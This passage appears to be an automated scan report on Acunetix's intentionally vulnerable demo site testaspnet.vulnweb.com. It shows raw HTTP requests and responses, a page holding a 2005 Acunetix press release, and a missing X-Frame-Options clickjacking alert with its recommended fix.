QgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
